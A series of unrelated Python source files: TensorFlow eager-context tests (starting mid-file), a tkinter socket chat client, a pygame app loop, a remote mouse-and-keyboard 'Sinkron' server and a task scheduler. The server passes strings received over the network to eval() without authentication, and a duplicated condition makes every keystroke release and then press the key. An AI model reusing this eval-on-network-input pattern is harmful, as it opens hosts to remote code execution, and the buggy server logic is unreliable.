ctx.summary_recording,
ctx.summary_step,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegexp(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.async_wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.async_wait()
context.async_clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
test_var = variables.Variable([2., 3.])
self.assertAllEqual(test_fn(test_var), 1.0)
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.Executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.async_wait()
context.async_clear_error()
context.context().execution_mode = context.SYNC
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEquals(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
configure_virtual_cpus()
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
client.py
|
import socket
import threading
import tkinter
import tkinter.scrolledtext
from tkinter import simpledialog
HOST = '127.0.0.1'
PORT = 9090
class Client:
def __init__(self, host, port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
msg = tkinter.Tk()
msg.withdraw()
self.nickname = simpledialog.askstring("Nickname", "Please choose a nickname", parent=msg)
self.gui_done = False
self.running = True
gui_thread = threading.Thread(target=self.gui_loop)
receive_thread = threading.Thread(target=self.receive)
gui_thread.start()
receive_thread.start()
def gui_loop(self):
self.win = tkinter.Tk()
self.win.configure(bg="lightblue")
self.chat_label = tkinter.Label(self.win, text="Chat:", bg="lightgray")
self.chat_label.config(font=("Arial", 12))
self.chat_label.pack(padx=20, pady=5)
self.text_area = tkinter.scrolledtext.ScrolledText(self.win)
self.text_area.pack(padx=20, pady=5)
self.text_area.config(state='disabled')
self.msg_label = tkinter.Label(self.win, text="Chat:", bg="lightgray")
self.msg_label.config(font=("Arial", 12))
self.msg_label.pack(padx=20, pady=5)
self.input_area = tkinter.Text(self.win, height=3)
self.input_area.pack(padx=20, pady=5)
self.send_button = tkinter.Button(self.win, text="Sent", command=self.write)
self.send_button.config(font=("Arial", 12))
self.send_button.pack(padx=20, pady=5)
self.gui_done = True
self.win.protocol("WM_DELETE_WINDOW",self.stop)
self.win.mainloop()
def write(self):
message = f"{self.nickname}: {self.input_area.get('1.0', 'end')}"
self.sock.send(message.encode('utf-8'))
self.input_area.delete('1.0', 'end')
def stop(self):
self.running = False
self.win.destroy()
self.sock.close()
exit(0)
def receive(self):
while self.running:
try:
message = self.sock.recv(1024).decode('utf-8')
if message == 'shubham':
self.sock.send(self.nickname.encode('utf-8'))
else:
if self.gui_done:
self.text_area.config(state='normal')
self.text_area.insert('end', message)
self.text_area.yview('end')
self.text_area.config(state='disabled')
except ConnectionAbortedError:
break
except:
print("Error")
self.sock.close()
break
client = Client(HOST, PORT)
|
app.py
|
import pygame
import numpy as np
import time
import threading
from .utils.LockableData import LockableData
from .Engine import Engine
WIDTH, HEIGHT = 1000, 1000
class App:
def __init__(self, width, height, title, requested_tps, engine):
self.settings = LockableData(running=False, tick=0, frame_since_update=0)
self._requested_tps = requested_tps
self._title = title
self.engine = engine
pygame.init()
self.screen = pygame.display.set_mode((width, height))
def _render_thread(self):
render_count = 0
fps = None
t_last = time.time_ns()
while self.settings.get('running'):
if time.time_ns() - t_last > 1E9:
t_last = time.time_ns()
fps = render_count
title = f'{self._title} - at {fps} FPS, {self._requested_tps} TPS'
print(title)
pygame.display.set_caption(title)
render_count = 0
self.engine.render(self.screen)
self.settings.incr('frame_since_update')
render_count += 1
def _stop(self):
self.settings.set('running', False)
def _tick_thread(self):
tick_count = 0
clock = pygame.time.Clock()
while self.settings.get('running'):
if self.engine.tick(self._stop, pygame.event.get(), tick_count):
self.settings.set('frame_since_update', 0)
tick_count += 1
clock.tick(self._requested_tps)
def run(self):
self.settings.set('running', True)
render_thread = threading.Thread(target=self._render_thread)
tick_thread = threading.Thread(target=self._tick_thread)
# Start treads and wait for them to stop
render_thread.start()
tick_thread.start()
render_thread.join()
tick_thread.join()
print('done')
pygame.quit()
if __name__ == "__main__":
e = Engine()
app = App(WIDTH, HEIGHT, 'Test Engine', 30, e)
app.run()
|
server.py
|
import socket
import mouse
import time
import re
from pynput.mouse import Button, Controller
from pynput.keyboard import Key
import pynput.keyboard
import tkinter
import sys
from tkinter import *
from functools import partial
import threading
m = Controller()
k = pynput.keyboard.Controller()
def start_server(ip, port):
HOST = ip
PORT = int(port)
currx = 0
curry = 0
#
def set_display_properties():
root = tkinter.Tk()
root.attributes('-alpha', 0)
root.attributes('-fullscreen', True)
return (root.winfo_screenwidth(), root.winfo_screenheight())
screen_dimensions = set_display_properties()
#
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as main_socket:
main_socket.bind((HOST, PORT))
main_socket.listen()
conn, addr = main_socket.accept()
with conn:
print('Connected by : ', addr)
server_screen = conn.recv(1024).decode('utf-8')
server_width = int(server_screen.split(':')[0])
server_height = int(server_screen.split(':')[1])
while True:
data = conn.recv(1024)
if not data: break
point = data.decode('utf-8')
try:
if point.split(')')[1] == '':
if point[:11] == 'ButtonEvent':
button_event = eval('mouse.' + point)
if button_event.event_type == 'up': m.release(button_event.button)
elif button_event.event_type == 'down': m.press(button_event.button)
else:
mouse.play([eval('mouse.' + point)])
except:
if point[:2] == 'kb':
if point[3] == 'a':
if point[2] == 'r': k.release(point[5:])
if point[2] == 'r': k.press(point[5:])
elif point[3] == 's':
if point[2] == 'r': k.release(eval(point[5:]))
if point[2] == 'r': k.press(eval(point[5:]))
def start_server_thread(ip, port):
main_server_thread = threading.Thread(target=start_server, args=(ip.get(), port.get()))
main_server_thread.start()
tk_window = Tk()
tk_window.geometry('200x150')
tk_window.title('Sinkron')
ip_label = Label(tk_window, text="IP Adress").grid(row=0, column=0)
ip = StringVar()
ip_entry = Entry(tk_window, textvariable=ip).grid(row=0, column=1)
port_label = Label(tk_window, text="Port").grid(row=1, column=0)
port = StringVar()
port_entry = Entry(tk_window, textvariable=port).grid(row=1, column=1)
start_server_thread = partial(start_server_thread, ip, port)
start_server_button = Button(tk_window, text="Start Server", command=start_server_thread).grid(row=4, column=0)
tk_window.mainloop()
# -
|
_schedulers.py
|
import datetime
import multiprocessing
from collections import defaultdict
from linora.utils._config import Config
__all__ = ['Schedulers']
class Schedulers():
"""Time job task manager."""
def __init__(self, logger=None, verbose=0, config_file=None):
"""
Args:
logger: Logger object, linora.utils.Logger() class.
verbose: Verbosity mode, 0 (silent), 1 (verbose).
config_file: job task config file, if .py file.
example: .py file name is schedulers_config.py, contain a dict,
config = {'hhh':{'mode':'every_minute', 'time':50, 'function':function, 'args':[], 'kwargs':{}}}
"""
self.config = dict()
self.params = Config()
self.params.verbose = verbose
if logger is None:
self.params.verbose = 0
self.params.logger = logger
self.params.config_file = config_file
manager = multiprocessing.Manager()
self.params.tracker_dict = manager.dict()
self.params.runner_dict = defaultdict()
def every_minute(self, time, function, args=None, kwargs=None, name=None):
"""Run task manager every minute.
Args:
time: int or str, Within range 0~59, 27 means the task will start at the 27th second every minute.
function: task function.
args: list, function args.
kwargs: dict, function kwargs.
name: task name, if None, is function name.
"""
if args is None:
args = list()
if kwargs is None:
kwargs = dict()
if name is None:
name = function.__name__+(f'_{len(self.config)+1}' if function.__name__ in self.config else '')
self.config[name] = {'mode':'every_minute', 'time':int(time), 'function':function, 'args':args,
'kwargs':kwargs, 'execute_num':0, 'runner':(function, args, kwargs, name),
'time_init':datetime.datetime.now()}
self.params.tracker_dict[name] = dict()
def every_hour(self, time, function, args=None, kwargs=None, name=None):
"""Run task manager every hour.
Args:
time: str, '30:27' means the task will start at the 30th minute and 27 seconds every hour.
function: task function.
args: list, function args.
kwargs: dict, function kwargs.
name: task name, if None, is function name.
"""
if args is None:
args = list()
if kwargs is None:
kwargs = dict()
if name is None:
name = function.__name__+(f'_{len(self.config)+1}' if function.__name__ in self.config else '')
self.config[name] = {'mode':'every_hour', 'time':time, 'function':function, 'args':args,
'kwargs':kwargs, 'execute_num':0, 'runner':(function, args, kwargs, name),
'time_init':datetime.datetime.now()}
self.params.tracker_dict[name] = dict()
def every_day(self, time, function, args=None, kwargs=None, name=None):
"""Run task manager every day.
Args:
time: str, '08:30:27' means that the task will start at the 30th minute and 27 seconds of the 8th hour every day.
function: task function.
args: list, function args.
kwargs: dict, function kwargs.
name: task name, if None, is function name.
"""
if args is None:
args = list()
if kwargs is None:
kwargs = dict()
if name is None:
name = function.__name__+(f'_{len(self.config)+1}' if function.__name__ in self.config else '')
self.config[name] = {'mode':'every_day', 'time':time, 'function':function, 'args':args,
'kwargs':kwargs, 'execute_num':0, 'runner':(function, args, kwargs, name),
'time_init':datetime.datetime.now()}
self.params.tracker_dict[name] = dict()
def every_week(self, time, function, args=None, kwargs=None, name=None):
"""Run task manager every week.
Args:
time: str, '1,3,7:08:30:27' means that every Monday, Wednesday, Sunday,
the 8th hour, 30 minutes and 27 seconds to start the task.
function: task function.
args: list, function args.
kwargs: dict, function kwargs.
name: task name, if None, is function name.
"""
if args is None:
args = list()
if kwargs is None:
kwargs = dict()
if name is None:
name = function.__name__+(f'_{len(self.config)+1}' if function.__name__ in self.config else '')
self.config[name] = {'mode':'every_week', 'time':time, 'function':function, 'args':args,
'kwargs':kwargs, 'execute_num':0, 'runner':(function, args, kwargs, name),
'time_init':datetime.datetime.now()}
self.params.tracker_dict[name] = dict()
def every_month(self, time, function, args=None, kwargs=None, name=None):
"""Run task manager every month.
Args:
time: str, '1,13,27:08:30:27' means that the task will start at the 30th minute and 27 seconds
of the 8th hour on the 1st, 13th, and 27th of each month.
function: task function.
args: list, function args.
kwargs: dict, function kwargs.
name: task name, if None, is function name.
"""
if args is None:
args = list()
if kwargs is None:
kwargs = dict()
if name is None:
name = function.__name__+(f'_{len(self.config)+1}' if function.__name__ in self.config else '')
self.config[name] = {'mode':'every_month', 'time':time, 'function':function, 'args':args,
'kwargs':kwargs, 'execute_num':0, 'runner':(function, args, kwargs, name),
'time_init':datetime.datetime.now()}
self.params.tracker_dict[name] = dict()
def _reset_time(self, name, time_now=None):
if time_now is None:
time_now = datetime.datetime.now()
if self.config[name]['mode']=='every_minute':
seconds = 60+self.config[name]['time']-time_now.second
elif self.config[name]['mode']=='every_hour':
split = self.config[name]['time'].split(':')
seconds = int(datetime.datetime(time_now.year, time_now.month, time_now.day, time_now.hour,
int(split[0]), int(split[1]), time_now.microsecond
).timestamp()-time_now.timestamp())
if seconds<40:
seconds = 3600+seconds
elif self.config[name]['mode']=='every_day':
split = self.config[name]['time'].split(':')
seconds = int(datetime.datetime(time_now.year, time_now.month, time_now.day, int(split[0]),
int(split[1]), int(split[2]), time_now.microsecond
).timestamp()-time_now.timestamp())
if seconds<40:
seconds = 86400+seconds
elif self.config[name]['mode']=='every_week':
split = self.config[name]['time'].split(':')
seconds = [int(i)-time_now.weekday()-1 for i in split[0].split(',')]
seconds = [(datetime.datetime(time_now.year, time_now.month, time_now.day, int(split[1]),
int(split[2]), int(split[3]), time_now.microsecond
)+datetime.timedelta(days=7+i if i<0 else i)
).timestamp()-time_now.timestamp()
for i in seconds]
if max(seconds)<40:
seconds= 604800+min(seconds)
else:
seconds = [i for i in sorted(seconds) if i>=40][0]
elif self.config[name]['mode']=='every_month':
split = self.config[name]['time'].split(':')
seconds = [datetime.datetime(time_now.year, time_now.month, int(i), int(split[1]),
int(split[2]), int(split[3]), time_now.microsecond
) for i in split[0].split(',')]
if time_now.month<12:
seconds += [datetime.datetime(time_now.year, time_now.month+1, int(i), int(split[1]),
int(split[2]), int(split[3]), time_now.microsecond
) for i in split[0].split(',')]
else:
seconds += [datetime.datetime(time_now.year+1, 1, int(i), int(split[1]),
int(split[2]), int(split[3]), time_now.microsecond
) for i in split[0].split(',')]
seconds = [i.timestamp()-time_now.timestamp() for i in seconds]
seconds = [i for i in sorted(seconds) if i>=40][0]
self.config[name]['time_next'] = time_now+datetime.timedelta(seconds=seconds)
self.config[name]['time_record'] = time_now
def run(self):
time_now = datetime.datetime.now()
if self.params.config_file is not None:
config = Config(file_py=self.params.config_file)
for name in config.config:
self.config[name] = config.config[name]
self.config[name]['execute_num'] = 0
self.config[name]['runner'] = (self.config[name]['function'], self.config[name]['args'],
self.config[name]['kwargs'], name)
self.config[name]['time_init'] = time_now
for name in self.config:
self._reset_time(name, time_now)
if self.params.verbose:
self.params.logger.info(f'New task {name} has been added.', write_file=True)
while True:
time_now = datetime.datetime.now()
for name in self.config:
if self.config[name]['time_next']>time_now:
self.config[name]['time_record'] = time_now
else:
self._start(self.config[name]['runner'])
